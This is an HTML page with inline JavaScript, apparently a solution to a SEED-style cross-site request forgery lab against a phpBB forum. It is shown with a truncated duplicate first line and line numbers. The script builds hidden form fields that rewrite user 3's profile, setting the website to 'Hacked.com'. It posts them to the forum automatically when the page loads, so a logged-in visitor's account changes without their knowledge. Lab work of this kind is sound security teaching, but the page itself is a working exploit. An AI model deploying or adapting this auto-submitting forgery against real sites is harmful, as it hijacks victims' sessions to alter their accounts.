<html><body><h1>Javascript </h1><script type="text/javascript">function po

1. <html><body><h1>
2. Javascript </h1>
3. <script type="text/javascript">
4. function post (url,fields)
5. {
6. var p = document.createElement('form');
7.  
8. p.action = url;
9. p.innerHTML = fields;
10. p.target = '_self';
11. p.method = 'post';
12.  
13. document.body.appendChild(p);
14.  
15. p.submit();
16. }
17.  
18. function csrf_hack()
19. {
20. var fields;
21. fields +="<input type='hidden' name='username' value='alice'>";
22. fields +="<input type='hidden' name='email' value='alice%40seed.com'>";
23. // fields +="<input type='hidden' name='cur_password' value=''>";
24. // fields +="<input type='hidden' name='new_password' value=''>";
25. // fields +="<input type='hidden' name='password_confirm' value=''>";
26. // fields +="<input type='hidden' name='icq' value=''>";
27. // fields +="<input type='hidden' name='aim' value=''>";
28. // fields +="<input type='hidden' name='msn' value=''>";
29. // fields +="<input type='hidden' name='yim' value=''>";
30. fields +="<input type='hidden' name='website' value='Hacked.com'>";
31. // fields +="<input type='hidden' name='location' value='World'>";
32. // fields +="<input type='hidden' name='occupation' value=''>";
33. // fields +="<input type='hidden' name='interests' value='Hacking'>";
34. // fields +="<input type='hidden' name='signature' value=''>";
35. // fields +="<input type='hidden' name='viewemail' value='0'>";
36. // fields +="<input type='hidden' name='hideonline' value='0'>";
37. // fields +="<input type='hidden' name='notifyreply' value='0'>";
38. // fields +="<input type='hidden' name='notifypm' value='1'>";
39. // fields +="<input type='hidden' name='popup_pm' value='1'>";
40. // fields +="<input type='hidden' name='attachsig' value='1'>";
41. // fields +="<input type='hidden' name='allowbbcode' value='1'>";
42. // fields +="<input type='hidden' name='allowhtml' value='0'>";
43. // fields +="<input type='hidden' name='allowsmilies' value='1'>";
44. // fields +="<input type='hidden' name='language' value='english'>";
45. // fields +="<input type='hidden' name='style' value='1'>";
46. // fields +="<input type='hidden' name='timezone' value='0'>";
47. // fields +="<input type='hidden' name='dateformat' value='D+M+d%2C+Y+g%3Ai+a'>";
48. // fields +="<input type='hidden' name='mode' value='editprofile'>";
49. fields +="<input type='hidden' name='agreed' value='true'>";
50. fields +="<input type='hidden' name='coppa' value='0'>";
51. fields +="<input type='hidden' name='user_id' value='3'>";
52. fields +="<input type='hidden' name='current_email' value='alice%40seed.com'>";
53. fields +="<input type='hidden' name='Submit' value='Submit'>";
54. fields +="<input type='hidden' name='reset' class='liteoption'/>";
55. post('http://www.csrflabphpbb.com/',fields);
56. }
57.  
58. window.onload = function() {csrf_hack();}
59. </script>
60. </body>
61. </html>